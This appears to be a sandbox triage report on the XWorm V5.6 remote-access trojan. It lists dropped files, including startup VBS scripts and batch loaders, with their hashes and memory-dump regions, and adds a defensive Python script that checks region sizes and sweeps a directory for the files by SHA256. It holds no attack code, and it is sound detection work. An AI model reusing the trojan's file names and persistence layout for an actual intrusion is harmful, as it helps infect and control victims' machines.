          23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

          SHA256

          0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

          SHA512

          40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

        • C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
          Filesize

          14.9MB

          MD5

          56ccb739926a725e78a7acf9af52c4bb

          SHA1

          5b01b90137871c3c8f0d04f510c4d56b23932cbc

          SHA256

          90f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405

          SHA512

          2fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1

        • C:\Users\Admin\AppData\Roaming\startup_str_256.vbs
          Filesize

          115B

          MD5

          1e1fb4978be450626368735642b24cf6

          SHA1

          4648de013017c5cbd173da217de6ba6f8daffe13

          SHA256

          225be32b3cb44f61d848b16e6304c1675c55582cd222d28ad8713b755f712d3b

          SHA512

          ecb0ef101c02369daddaab4fe2ea8bf970b2b25887c16e944ebf29681f38376d0e24aca19e1258ff1544394e3b6c95d5565c29aee3ba94f4188f9a0c114cc50a

        • C:\Users\Admin\AppData\Roaming\startup_str_810.vbs
          Filesize

          115B

          MD5

          8add26512730c8e2a8a81a310074e3ab

          SHA1

          c56304923ea7d5996fc9b905edd80f4b49b6c101

          SHA256

          2f94e63e575f2d9feb58d719da8084c0c70269ee5cc138266a74d4924e791264

          SHA512

          e5d197f3842ed97b3828531f29ba0222a7f92103da1bddd5bf257b868af91aa8245726b4cc478df153672cc7ae54bfc6be3717283b2009358c35f918d47abc3b

        • C:\Users\Admin\AppData\Roaming\xfixer.bat
          Filesize

          304KB

          MD5

          28a668375e0d2b1cfa1d847fc44934d4

          SHA1

          bd0d7df2f07f879e97e02d13d9eebf0a584fabe7

          SHA256

          cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160

          SHA512

          d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c

        • C:\Users\Admin\AppData\Roaming\xworm.bat
          Filesize

          317KB

          MD5

          ada0b01d33911547bb0086e0ed152484

          SHA1

          ec81374c631f94c536b51dfb8c42c063bf72ca78

          SHA256

          aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1

          SHA512

          6aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26

        • C:\Users\Admin\AppData\Roaming\xworm.bat.exe
          Filesize

          423KB

          MD5

          c32ca4acfcc635ec1ea6ed8a34df5fac

          SHA1

          f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

          SHA256

          73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

          SHA512

          6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

        • memory/228-247-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/544-90-0x0000000007300000-0x0000000007554000-memory.dmp
          Filesize

          2.3MB

        • memory/920-170-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/1120-362-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/1304-85-0x00000000078E0000-0x0000000007B32000-memory.dmp
          Filesize

          2.3MB

        • memory/1652-324-0x00000000088D0000-0x0000000008946000-memory.dmp
          Filesize

          472KB

        • memory/1652-272-0x00000000053F0000-0x000000000540E000-memory.dmp
          Filesize

          120KB

        • memory/1652-273-0x0000000008AA0000-0x00000000090B8000-memory.dmp
          Filesize

          6.1MB

        • memory/1652-274-0x0000000007C10000-0x0000000007C22000-memory.dmp
          Filesize

          72KB

        • memory/1652-275-0x0000000007C70000-0x0000000007CAC000-memory.dmp
          Filesize

          240KB

        • memory/1652-276-0x0000000008480000-0x000000000858A000-memory.dmp
          Filesize

          1.0MB

        • memory/1652-311-0x00000000090C0000-0x0000000009282000-memory.dmp
          Filesize

          1.8MB

        • memory/1652-312-0x00000000097C0000-0x0000000009CEC000-memory.dmp
          Filesize

          5.2MB

        • memory/1652-325-0x00000000089F0000-0x0000000008A82000-memory.dmp
          Filesize

          584KB

        • memory/1652-326-0x000000000A2A0000-0x000000000A844000-memory.dmp
          Filesize

          5.6MB

        • memory/1652-327-0x00000000092F0000-0x000000000930E000-memory.dmp
          Filesize

          120KB

        • memory/1836-37-0x000001E2E3BE0000-0x000001E2E4AC8000-memory.dmp
          Filesize

          14.9MB

        • memory/1948-313-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/1948-323-0x0000000007900000-0x00000000079A3000-memory.dmp
          Filesize

          652KB

        • memory/1948-350-0x0000000007C20000-0x0000000007C34000-memory.dmp
          Filesize

          80KB

        • memory/1948-328-0x0000000007BE0000-0x0000000007BF1000-memory.dmp
          Filesize

          68KB

        • memory/2460-6-0x000000007374E000-0x000000007374F000-memory.dmp
          Filesize

          4KB

        • memory/2460-88-0x0000000007D30000-0x0000000007D4A000-memory.dmp
          Filesize

          104KB

        • memory/2460-94-0x0000000073740000-0x0000000073EF0000-memory.dmp
          Filesize

          7.7MB

        • memory/2460-7-0x00000000030F0000-0x0000000003126000-memory.dmp
          Filesize

          216KB

        • memory/2460-12-0x0000000005810000-0x0000000005E38000-memory.dmp
          Filesize

          6.2MB

        • memory/2460-57-0x0000000006CA0000-0x0000000006CD2000-memory.dmp
          Filesize

          200KB

        • memory/2460-89-0x0000000007C80000-0x0000000007C88000-memory.dmp
          Filesize

          32KB

        • memory/2460-69-0x00000000078D0000-0x0000000007973000-memory.dmp
          Filesize

          652KB

        • memory/2460-86-0x0000000007C50000-0x0000000007C64000-memory.dmp
          Filesize

          80KB

        • memory/2460-84-0x0000000007C40000-0x0000000007C4E000-memory.dmp
          Filesize

          56KB

        • memory/2460-83-0x0000000007C00000-0x0000000007C11000-memory.dmp
          Filesize

          68KB

        • memory/2460-82-0x0000000007C90000-0x0000000007D26000-memory.dmp
          Filesize

          600KB

        • memory/2460-18-0x0000000073740000-0x0000000073EF0000-memory.dmp
          Filesize

          7.7MB

        • memory/2460-11-0x0000000073740000-0x0000000073EF0000-memory.dmp
          Filesize

          7.7MB

        • memory/2460-20-0x0000000005710000-0x0000000005732000-memory.dmp
          Filesize

          136KB

        • memory/2460-21-0x0000000005FF0000-0x0000000006056000-memory.dmp
          Filesize

          408KB

        • memory/2460-81-0x0000000007A70000-0x0000000007A7A000-memory.dmp
          Filesize

          40KB

        • memory/2460-79-0x0000000008040000-0x00000000086BA000-memory.dmp
          Filesize

          6.5MB

        • memory/2460-80-0x0000000007A00000-0x0000000007A1A000-memory.dmp
          Filesize

          104KB

        • memory/2460-23-0x0000000006060000-0x00000000060C6000-memory.dmp
          Filesize

          408KB

        • memory/2460-36-0x00000000060D0000-0x0000000006424000-memory.dmp
          Filesize

          3.3MB

        • memory/2460-38-0x00000000066D0000-0x00000000066EE000-memory.dmp
          Filesize

          120KB

        • memory/2460-39-0x0000000006720000-0x000000000676C000-memory.dmp
          Filesize

          304KB

        • memory/2460-68-0x0000000006CE0000-0x0000000006CFE000-memory.dmp
          Filesize

          120KB

        • memory/2460-58-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/2712-268-0x0000000004810000-0x0000000004826000-memory.dmp
          Filesize

          88KB

        • memory/2712-555-0x0000000008FA0000-0x00000000090BE000-memory.dmp
          Filesize

          1.1MB

        • memory/2712-269-0x0000000006FF0000-0x000000000708C000-memory.dmp
          Filesize

          624KB

        • memory/2712-554-0x00000000080B0000-0x00000000080BE000-memory.dmp
          Filesize

          56KB

        • memory/2712-549-0x0000000007C00000-0x0000000007C0A000-memory.dmp
          Filesize

          40KB

        • memory/2876-257-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/3340-287-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/3340-299-0x0000000007EA0000-0x0000000007EB4000-memory.dmp
          Filesize

          80KB

        • memory/3340-297-0x0000000007AF0000-0x0000000007B93000-memory.dmp
          Filesize

          652KB

        • memory/3340-298-0x0000000007E60000-0x0000000007E71000-memory.dmp
          Filesize

          68KB

        • memory/4596-125-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/4612-537-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/4796-115-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

        • memory/4932-169-0x0000000007A70000-0x0000000007B13000-memory.dmp
          Filesize

          652KB

        • memory/4932-180-0x0000000007DB0000-0x0000000007DC1000-memory.dmp
          Filesize

          68KB

        • memory/4932-159-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB
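The listing above is raw triage data: five dropped files with their digests and several dozen memory-dump regions named by PID and address range. Two checks a responder would want before reusing it are (a) that the address ranges really correspond to the sizes printed next to them, with a view of which ranges recur across processes, and (b) a way to sweep a directory for the dropped files by SHA256. The script below does both. It is an added example, not part of the sandbox report or any tool it was produced by. The memory entries are a constructed subset copied from the listing; the meaning of the identifier fields (pid, sequence number, start, end) and the report's size formatting (binary units, whole KB, MB to one decimal) are inferred from the pattern and are assumptions.

```python
import hashlib
import os
import re
from collections import defaultdict

# Constructed subset of the report's memory-dump entries: (identifier, reported size).
MEMORY_ENTRIES = [
    ("memory/228-247-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/544-90-0x0000000007300000-0x0000000007554000-memory.dmp", "2.3MB"),
    ("memory/920-170-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/1120-362-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/1652-276-0x0000000008480000-0x000000000858A000-memory.dmp", "1.0MB"),
    ("memory/1836-37-0x000001E2E3BE0000-0x000001E2E4AC8000-memory.dmp", "14.9MB"),
    ("memory/1948-313-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/2460-6-0x000000007374E000-0x000000007374F000-memory.dmp", "4KB"),
    ("memory/2460-58-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/2460-94-0x0000000073740000-0x0000000073EF0000-memory.dmp", "7.7MB"),
    ("memory/2876-257-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/3340-287-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/4596-125-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/4612-537-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/4796-115-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
    ("memory/4932-159-0x0000000075300000-0x000000007534C000-memory.dmp", "304KB"),
]

# Dropped files from the report, keyed by SHA256 (the only digest used for matching).
DROPPED_SHA256 = {
    "225be32b3cb44f61d848b16e6304c1675c55582cd222d28ad8713b755f712d3b": "startup_str_256.vbs",
    "2f94e63e575f2d9feb58d719da8084c0c70269ee5cc138266a74d4924e791264": "startup_str_810.vbs",
    "cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160": "xfixer.bat",
    "aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1": "xworm.bat",
    "73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70": "xworm.bat.exe",
}

# Field meaning (pid, sequence, start, end) is assumed from the naming pattern.
MEMORY_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_memory_id(identifier):
    """Split "memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp" into its fields."""
    m = MEMORY_RE.match(identifier)
    if not m:
        raise ValueError(f"not a memory-dump identifier: {identifier}")
    pid, seq, start, end = int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)
    if end <= start:
        raise ValueError(f"end is not after start: {identifier}")
    return {"pid": pid, "seq": seq, "start": start, "end": end, "size": end - start}


def human_size(n):
    """Render a byte count the way the report appears to (assumed: binary units, whole KB,
    MB to one decimal). Regions are page-aligned, so the KB values divide exactly."""
    if n < 1024 * 1024:
        return f"{n // 1024}KB"
    return f"{n / (1024 * 1024):.1f}MB"


def check_sizes(entries=MEMORY_ENTRIES):
    """Return identifiers whose computed region size disagrees with the reported size."""
    return [ident for ident, reported in entries
            if human_size(parse_memory_id(ident)["size"]) != reported]


def shared_ranges(entries=MEMORY_ENTRIES, min_pids=2):
    """Map (start, end) -> sorted PIDs for ranges dumped from at least min_pids processes.
    One range at one fixed address recurring across many PIDs is worth a second look."""
    pids = defaultdict(set)
    for ident, _ in entries:
        r = parse_memory_id(ident)
        pids[(r["start"], r["end"])].add(r["pid"])
    return {k: sorted(v) for k, v in pids.items() if len(v) >= min_pids}


def file_hashes(path, chunk=1 << 20):
    """MD5/SHA1/SHA256/SHA512 of a file in one pass: the four digests the report lists."""
    hashes = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256", "sha512")}
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            for h in hashes.values():
                h.update(block)
    return {name: h.hexdigest() for name, h in hashes.items()}


def sweep(root, iocs=DROPPED_SHA256):
    """Walk root and return [(path, dropped-file name)] for files whose SHA256 is in iocs.
    On a live host, point root at %APPDATA%, where the report places these files."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                digest = file_hashes(path)["sha256"]
            except OSError:
                continue  # unreadable or vanished between listing and hashing
            if digest in iocs:
                hits.append((path, iocs[digest]))
    return hits


if __name__ == "__main__":
    print("size mismatches:", check_sizes())
    for (start, end), pids in shared_ranges().items():
        print(f"0x{start:X}-0x{end:X} dumped from {len(pids)} PIDs: {pids}")
    print("dropped-file hits:", sweep(os.environ.get("APPDATA", ".")))
```

Run against the subset above, `check_sizes()` comes back empty, so the printed sizes are consistent with the address ranges, and `shared_ranges()` reports the 0x75300000-0x7534C000 region (304KB) from eleven of the listed PIDs. The sweep matches on SHA256 only; the MD5 and SHA1 values in the report are still computed by `file_hashes` so a hit can be cross-checked against all four digests.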